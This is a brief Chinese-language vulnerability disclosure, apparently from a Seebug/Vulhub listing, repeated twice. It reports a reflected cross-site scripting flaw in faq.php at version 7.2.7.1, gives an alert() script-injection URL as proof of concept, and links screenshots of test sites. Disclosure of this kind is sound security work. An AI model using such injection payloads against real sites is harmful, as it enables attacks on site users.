VULHUB ™

### 简要描述： 版本。7.2.7.1都可以X。。只是试了几个站。 其他版本没测试。 ### 详细说明： 文件出在faq.php。。faq.php?action="><script>alert('XSS')</script>search& 提交到本页面。然后登陆 。。跨站形成。 ### 漏洞证明： 测试站点： [<img src="https://images.seebug.org/upload/201101/131302006941767e4e1781d1ad95a54cc71aacaf.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201101/131302006941767e4e1781d1ad95a54cc71aacaf.jpg) [<img src="https://images.seebug.org/upload/201101/131301511949a2f032b97cd6d6e285cd5ad291bd.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201101/131301511949a2f032b97cd6d6e285cd5ad291bd.jpg) [<img src="https://images.seebug.org/upload/201101/1313014440521166d73b2cffb6f5acc201228180.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201101/1313014440521166d73b2cffb6f5acc201228180.jpg)

### 简要描述： 版本。7.2.7.1都可以X。。只是试了几个站。 其他版本没测试。 ### 详细说明： 文件出在faq.php。。faq.php?action="><script>alert('XSS')</script>search& 提交到本页面。然后登陆 。。跨站形成。 ### 漏洞证明： 测试站点： [<img src="https://images.seebug.org/upload/201101/131302006941767e4e1781d1ad95a54cc71aacaf.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201101/131302006941767e4e1781d1ad95a54cc71aacaf.jpg) [<img src="https://images.seebug.org/upload/201101/131301511949a2f032b97cd6d6e285cd5ad291bd.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201101/131301511949a2f032b97cd6d6e285cd5ad291bd.jpg) [<img src="https://images.seebug.org/upload/201101/1313014440521166d73b2cffb6f5acc201228180.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201101/1313014440521166d73b2cffb6f5acc201228180.jpg)